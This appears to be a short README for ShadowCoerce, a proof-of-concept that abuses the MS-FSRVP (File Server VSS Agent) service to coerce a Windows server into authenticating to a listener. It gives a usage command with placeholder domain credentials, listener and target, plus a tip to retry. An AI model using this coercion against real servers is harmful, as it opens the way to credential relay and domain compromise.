MS-FSRVP coercion abuse PoC
Credits: Gilles LIONEL (a.k.a. Topotam)
“File Server VSS Agent Service” needs to be enabled on the target server.
shadowcoerce.py -d "domain" -u "user" -p "password" LISTENER TARGET
In my tests, the coercion needed to be attempted twice in order to work when the FssAgent hadn’t been requested in a while. TL;DR: run the command twice if it doesn’t work.